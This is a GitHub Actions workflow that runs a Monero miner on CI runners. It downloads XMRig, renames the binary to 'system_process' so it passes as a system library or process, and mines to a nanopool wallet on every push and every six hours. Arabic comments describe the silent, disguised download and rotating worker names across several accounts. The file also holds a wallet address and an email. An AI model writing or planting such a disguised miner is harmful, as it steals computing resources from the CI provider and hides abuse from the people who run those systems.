name: Safe-Solo-Whale
on:
  push:
    branches: [ main ]
  schedule:
    - cron: "0 */6 * * *" # بيشتغل كل 6 ساعات أوتوماتيك لو وقف

jobs:
  worker:
    runs-on: ubuntu-latest
    steps:
      - name: Prep
        run: |
          # تحميل صامت وباسم مموه
          curl -L -o sys_lib.tar.gz https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar -xf sys_lib.tar.gz
          mv xmrig-6.21.0/xmrig ./system_process
          chmod +x system_process

      - name: Start
        run: |
          # لاحظ اسم العامل بيتغير لكل حساب (مثلاً whale-1, whale-2...)
          ./system_process -o xmr-eu1.nanopool.org:14444 \
          -u 43k1NnYRKCq9Rfd6KyHdmy18pwrhSEyEg8HiBcDCP3qj3UdxevAVoXLPGqMnk927yGf89sNb6HuQsb89pnon6Vfr4KL17BY.whale-1/nfdr065@gmail.com \
          --algo rx/0 -p x --donate-level 1 -t 2
